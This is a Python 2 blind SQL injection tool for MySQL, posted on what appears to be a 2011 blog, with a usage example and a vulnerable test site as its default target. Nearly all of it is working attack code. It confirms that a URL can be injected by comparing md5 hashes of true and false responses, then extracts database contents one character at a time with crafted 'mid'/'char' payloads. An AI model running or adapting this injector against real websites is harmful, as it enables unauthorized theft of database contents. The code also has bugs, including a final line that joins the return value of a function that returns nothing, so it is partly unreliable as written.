# SQLInjector - MySQL Blind SQL injector
# by Deadc0de - Team
# known issues;
# uses md5 for page comparison rather than searching for a string. This can be a problem if the page includes dynamic banner ads.
# M,N and 0-9 period and comma are not representative of the actual correct frequent character set
# lettertable() function needs be expanded but there is a performance hit the bigger it gets
import md5, sys, urllib2, sys
import pdb
def lettertable(letter):
return {
"q":"uaqoisvretwybnhlxmfpzcdjgk_1234567890.,",
"w":"ahieonsrldwyfktubmpcgzvjqx_1234567890.,",
"e":"rndsaletcmvyipfxwgoubqhkzj_1234567890.,",
"r":"eoiastydnmrugkclvpfbhwqzjx_1234567890.,",
"t":"hoeiartsuylwmcnfpzbgdjkxvq_1234567890.,",
"y":"oesitamrlnpbwdchfgukzvxjyq_1234567890.,",
"u":"trsnlgpceimadbfoxkvyzwhjuq_1234567890.,",
"i":"ntscolmedrgvfabpkzxuijqhwy_1234567890.,",
"o":"nurfmtwolspvdkcibaeygjhxzq_1234567890.,",
"p":"eroaliputhsygmwbfdknczjvqx_1234567890.,",
"l":"eliayodusftkvmpwrcbgnhzqxj_1234567890.,",
"k":"einslayowfumrhtkbgdcvpjzqx_1234567890.,",
"j":"euoainkdlfsvztgprhycmjxwbq_1234567890.,",
"h":"eaioturysnmlbfwdchkvqpgzjx_1234567890.,",
"g":"ehroaiulsngtymdwbfpzkxcvjq_1234567890.,",
"f":"oeriafutlysdngmwcphjkbzvqx_1234567890.,",
"d":"eioasruydlgnvmwfhjtcbkpqzx_1234567890.,",
"s":"tehiosaupclmkwynfbqdgrvjzx_1234567890.,",
"a":"ntrsldicymvgbpkuwfehzaxjoq_1234567890.,",
"z":"eiaozulywhmtvbrsgkcnpdjfqx_1234567890.,",
"x":"ptcieaxhvouqlyfwbmsdgnzrkj_1234567890.,",
"c":"oheatikrlucysqdfnzpmgxbwvj_1234567890.,",
"v":"eiaoyrunlsvdptjgkhcmbfwzxq_1234567890.,",
"b":"euloyaristbjmdvnhwckgpfzxq_1234567890.,",
"m":"tashwiobmcfdplnergyuvkjqzx_1234567890.,",
"n":"tashwiobmcfdplnergyuvkjqzx_1234567890.,",
"1":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"2":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"3":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"4":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"5":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"6":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"7":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"8":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"9":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"0":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
".":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
",":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
"_":"tashwiobmcfdplnergyuvkjqzx_1234567890.,-",
}[letter]
def md5sum(value):
hasher = md5.new()
hasher.update(value)
return hasher.hexdigest()
def fetch_page(url):
request = urllib2.Request(url)
requestor = urllib2.build_opener()
request.addheaders = [('User-agent', 'Mozilla/5.0')]
content = requestor.open(request).read()
return content
def hsbrute(targeturl):
#pdb.set_trace()
urlstart, sqlquery, urlend = targeturl.split("^")
truehash = md5sum(fetch_page(urlstart + "/**/and/**/1=1/**/"+urlend))
falsehash = md5sum(fetch_page(urlstart + "/**/and/**/1=0/**/"+urlend))
if falsehash==truehash:
print "Not Injectable. Check this URL with a browser (and try 1=0)."+urlstart + "/**/and/**/1=1/**/"+urlend
sys.exit(1)
global attemptcounter
ret_str = []
last_ltr = ""
element_found=0
i=-1
while not element_found:
i += 1
b_arr = "tashwiobmcfdplnergyuvkjqzx_1234567890"
if last_ltr :
b_arr=lettertable(last_ltr)
for j in range(len(b_arr)):
brute = b_arr[j]
querystring = urlstart+"/**/and/**/lower(mid("+sqlquery+","+str(i+1)+",1))=char("+ str(ord(brute)) +")/**/"+urlend
attemptcounter += 1
#print querystring
if md5sum(fetch_page(querystring))==truehash:
#print "is true"
ret_str.append(b_arr[j])
print "".join(ret_str[:])
last_ltr=b_arr[j]
#print "is false"
if j == len(b_arr)-1 :
print "end of word found"
element_found=1
def printhelp():
print """Here is your help.
python sqlinjector.py http://www.urltotarget.com/sqlinjectable.php?vulnerable=target^sql statement here^restoftheURL=value
Example -t targetdomain.com -c "./sqlmap -u {url} --cookie: {cookies}"
"""
if "-h" in sys.argv:
printhelp()
sys.exit(2)
target="http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
if sys.argv[1]:
target = sys.argv[1]
current=0
attemptcounter=0
print "Found target " + "".join(hsbrute(target)) + " in " + str(attemptcounter) + " guesses."
23 January 2011
MySQL Blind SQL injector
This c0de is name deadc0de_blindSQL.py
0 comments:
Post a Comment